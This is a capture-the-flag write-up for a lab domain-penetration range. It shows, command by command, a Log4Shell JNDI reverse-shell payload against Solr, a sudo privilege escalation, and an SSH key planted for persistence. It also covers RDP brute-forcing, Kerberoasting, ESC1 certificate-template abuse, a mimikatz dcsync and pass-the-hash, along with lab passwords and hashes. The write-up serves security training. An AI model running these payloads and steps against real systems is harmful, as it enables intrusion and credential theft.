Spring and Autumn Cloud Mirror-Certify-Writeup

Target introduction:
Certify is a medium-difficulty shooting range environment. Completing this challenge can help players understand agent forwarding, intranet scanning, information collection, etc. in intranet penetration. Privilege escalation and lateral movement technical methods, strengthen the understanding of the core authentication mechanism of the domain environment, and master some interesting technical points in domain environment penetration. There are 4 flags in the shooting range, which are distributed among different target drones.

Start an IP

39.xx.xx.xxx

Scan to find a Solr admin

icmp alive hosts len is: 1
39.xx.xx.xxx:22 open
39.xx.xx.xxx:8983 open
39.xx.xx.xxx:80 open
alive ports len is: 3
start vulscan
[*] WebTitle:http://39.xx.xx.xxx      code:200 len:17     title:Welcome to nginx!
[*] WebTitle:http://39.xx.xx.xxx:8983 code:302 len:0      title:None
[*] WebTitle:http://39.xx.xx.xxx:8983/solr/ code:200 len:10     title:Solr Admin

Apache Solr <= 8.3.0 has an rce vulnerability
After trying it, I found that the target does not exist
After a twist of events, I found that Log4j can also be used

通过可控的 Collections 来进行 JNDI注入，路径为

/solr/admin/collections?action=xxxxx

After testing with dnslog, you can see the echo.

http://39.xx.xx.xx:8983/solr/admin/collections?action=${jndi:ldap://dnslog.wnc78i.dnslog.cn}

So I started to rebound the shell
The original project is gone,
I used the one passed by other masters
https: //github.com/black9/Log4shell_JNDIExploit.git

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 175.xx.xx.xx -p 8888
/solr/admin/collections?action=${jndi:ldap://175.xx.xx.xx:1389/Basic/ReverseShell/175.xx.xx.xx/9999}

The monitoring end also successfully received the rebound.

sudo -l can find a NOPASSWD execution grc

sudo grc --pty /bin/bash -i

You can get a root shell

Flag01.txt can be obtained

flag01: flag{366d6ba1-71fd-4b1a-94ad-5df60eb7433a}

netstat -ntplIt is found that the target has ssh enabled
so we can write the public key for remote ssh without changing the ssh password< /span>

Generate rsa key

ssh-keygen -t rsa 

So write the generated id_rsa.pub to the target .ssh directory and name it authorized_keys

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC09OeRl9NEQd/QfCp6aYdQN8wBXJxfZT93KHLaHkA5QghDSYnIzLtQROGZNmRaqyd3hasL0hIC9GKxsaC8JLo0ntUe7RQRyfDGnO00j6V7eqi7kzHgxg0Kjpuz5O0wtbmQz6Ibr7KquI0y/770OE1Ma68aTNXxhDY3/zoji5BnBSre+JvPrNiQlJW2fS6MjAz3xZ4T/cJ55LEIQHoJrsUx1xzu6dzlnYlWwPQsh9Ca59xzpecRagkVxCLX2q6fU6edh7M0sP11XT+lqPye0J/x7jN9ChY70BjZrAYsP2CmmU93yHWrV7sT2yBfpq5QPBTjyz/N+D7xLi8ZKEO4jzWS1E0ll0DOvwrKS11+g6Jfx3bPINOoteUcCM0wLl58drov91PIlRlPD5q1e/j5ngfKYZ4gUSzFgXxMQySa7D8zqX5w9OpxeYO2Og2uE6eYGE7Y7a9inaRvI2dfcPpa8YlMhz+wvJ5yKM9oewFCz9qaS6KWBVmdoxtCEFakbGRvT6c= ubuntu@VM-20-4-ubuntu' >>authorized_keys

Successful login

There are many ways to upload the frp client and fscan. You can refer to other articles on myblog
After the proxy is established, useProxifier to connect

fscan 扫描的结果如下
start infoscan
(icmp) Target 172.22.9.19     is alive
(icmp) Target 172.22.9.7      is alive
(icmp) Target 172.22.9.13     is alive
(icmp) Target 172.22.9.26     is alive
(icmp) Target 172.22.9.47     is alive
[*] Icmp alive hosts len is: 5
172.22.9.47:21 open
172.22.9.19:22 open
172.22.9.19:8983 open
172.22.9.26:80 open
172.22.9.47:80 open
172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.7:88 open
172.22.9.13:445 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:445 open
172.22.9.26:139 open
172.22.9.13:139 open
172.22.9.7:139 open
172.22.9.26:135 open
172.22.9.13:135 open
172.22.9.7:135 open
172.22.9.47:139 open
[*] alive ports len is: 19
start vulscan
[*] WebTitle:http://172.22.9.19        code:200 len:612    title:Welcome to nginx!
[+] NetInfo:
[*]172.22.9.7
   [->]XIAORANG-DC
   [->]172.22.9.7
[+] NetInfo:
[*]172.22.9.26
   [->]DESKTOP-CBKTVMO
   [->]172.22.9.26
[+] NetInfo:
[*]172.22.9.13
   [->]CA01
   [->]172.22.9.13
[*] WebTitle:http://172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] 172.22.9.13          XIAORANG\CA01
[*] 172.22.9.7     [+]DC XIAORANG\XIAORANG-DC
[*] 172.22.9.26          XIAORANG\DESKTOP-CBKTVMO
[*] 172.22.9.47          WORKGROUP\FILESERVER        Windows 6.1
[*] 172.22.9.47  (Windows 6.1)
[*] WebTitle:http://172.22.9.19:8983   code:302 len:0      title:None 跳转url: http://172.22.9.19:8983/solr/
[*] WebTitle:http://172.22.9.26        code:200 len:703    title:IIS Windows Server
[*] WebTitle:http://172.22.9.19:8983/solr/ code:200 len:16555  title:Solr Admin

At first glance, there seems to be nothing to take advantage of. View the web through a proxy
It is also the default page of nginx and apache
Through smbclient List smbs that can be accessed anonymously

smbclient -L //172.22.9.47/

smbclient  //172.22.9.47/fileserver

Download all the files inside
Get flag02

 ________  _______   ________  _________  ___  ________ ___    ___ 
|\   ____\|\  ___ \ |\   __  \|\___   ___\\  \|\  _____\\  \  /  /|
\ \  \___|\ \   __/|\ \  \|\  \|___ \  \_\ \  \ \  \__/\ \  \/  / /
 \ \  \    \ \  \_|/_\ \   _  _\   \ \  \ \ \  \ \   __\\ \    / / 
  \ \  \____\ \  \_|\ \ \  \\  \|   \ \  \ \ \  \ \  \_| \/  /  /  
   \ \_______\ \_______\ \__\\ _\    \ \__\ \ \__\ \__\__/  / /    
    \|_______|\|_______|\|__|\|__|    \|__|  \|__|\|__|\___/ /     
                                                      \|___|/      

flag02: flag{efaa6dd8-3e17-4122-a768-2f077d34fb54}

Yes, you have enumerated smb. But do you know what an SPN is?

And a SQLite database
Use navicat to open it and you can find some names

and some passwords

Combine the tips given above
Find a way to bump out a few users

 hydra -L user.txt -P pass 172.22.9.26 rdp  

got two

login: zhangjian password: i9XDE02pLVf
login: liupeng password: fiAzGwEMgTY

Get the service ticket of the user's SPN (Kerberoast attack)

impacket-GetUserSPNs -dc-ip 172.22.9.7  xiaorang.lab/zhangjian:i9XDE02pLVf -request

This default export can be cracked using hashcat.

hashcat hashc.txt  -m 13100  /usr/share/wordlist/rockyou.txt --show

get password

chenchen  @Passw0rd@
zhangxia MyPass2@@6

Successfully logged in to 172.22.9.26 as user zhangxia

The pdf in the anonymous SMB previously mentioned this

Using Misconfigured Certificate Templates - ESC1 (Certificate template configuration error) to perform intra-domain privilege escalation
Certify project: https://github.com/GhostPack/Certify

找到存在漏洞的证书模板
Certify.exe find /vulnerable

Run Certify to request the certificate and designate /altname as the domain administrator

Certify.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:"XR Manager"  /altname:xiaorang\Administrator

Certificate requested

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Do not enter password
GeneratepfxCertificate
In cooperation with Rubeus Request TGT,PTT
Project address:Rubeus

password 可以为空

Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password: /ptt

Use mimikatz to perform dcsync to export domain control hash

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

Then use wmiexec to exploit and get the remaining two flags.

impacket-wmiexec  XIAORANG.LAB/[email protected] -hashes :2f1b57eefb2d152196836b0516abea80

flag03: flag{990600da-05ce-40d8-b7b2-9230ab88bcd4}

impacket-wmiexec  XIAORANG.LAB/[email protected] -hashes :2f1b57eefb2d152196836b0516abea80

flag04: flag{436cff95-95f9-408c-ad58-3be79709e2d4}